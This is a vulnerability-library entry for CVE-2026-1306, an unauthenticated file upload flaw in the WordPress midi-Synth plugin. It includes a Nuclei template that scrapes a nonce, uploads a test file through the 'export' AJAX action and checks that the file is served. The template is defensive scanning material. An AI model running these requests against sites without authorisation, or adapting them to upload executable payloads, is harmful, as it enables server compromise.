/Vulnerability Library

WordPress midi-Synth <= 1.1.0 - Unauthenticated Arbitrary File Upload

CVE-2026-1306
Verified

Description

WordPress midi-Synth plugin \u003C= 1.1.0 contains an unrestricted file upload vulnerability caused by missing file type and extension validation in the 'export' AJAX action, letting unauthenticated attackers upload arbitrary files and potentially execute remote code, exploit requires attacker to obtain a valid nonce exposed in frontend JavaScript.

Severity

Critical

CVSS Score

9.8

Exploit Probability

30%

Affected Product

midi-synth

Published Date

March 23, 2026

Template Author

pussycat0x

CVE-2026-1306.yaml
id: CVE-2026-1306

info:
  name: WordPress midi-Synth <= 1.1.0 - Unauthenticated Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    WordPress midi-Synth plugin \u003C= 1.1.0 contains an unrestricted file upload vulnerability caused by missing file type and extension validation in the 'export' AJAX action, letting unauthenticated attackers upload arbitrary files and potentially execute remote code, exploit requires attacker to obtain a valid nonce exposed in frontend JavaScript.
  impact: |
    Unauthenticated attackers can upload arbitrary files and potentially execute remote code on the server.
  remediation: |
    Update to the latest version of midi-Synth plugin.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/midi-synth/midi-synth-110-unauthenticated-arbitrary-file-upload-via-export-ajax-action
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1306
    epss-score: 0.29997
    epss-percentile: 0.96723
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: wordpress
    product: midi-synth
    framework: wordpress
  tags: cve,cve2026,wordpress,wp-plugin,midi-synth,file-upload,rce,intrusive

variables:
  randstr: "{{rand_base_string(8)}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/

        action=export&nonce={{nonce}}&fileName={{randstr}}.txt&fileMidi={{base64("{{randstr}}")}}

      - |
        GET /wp-content/plugins/midi-synth/sound/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        internal: true
        regex:
          - 'var midiSynth_nonce     = "([a-z0-9]+)"'
        group: 1

    matchers:
      - type: dsl
        dsl:
          - status_code_3 == 200
          - contains(body_3, "{{randstr}}")
        condition: and
# digest: 4b0a00483046022100c5ff321eb87d16511eab403bd7b9819482afc2097e505d3f0817aedcda0a72ba022100efe6f62e3dda3a3be55cc1e4a15df09efe078ff7515a57c089082f29429e5cc0:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-1306
CWE ID:
cwe-434

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/midi-synth/midi-synth-110-unauthenticated-arbitrary-file-upload-via-export-ajax-action

Remediation Steps

Update to the latest version of midi-Synth plugin.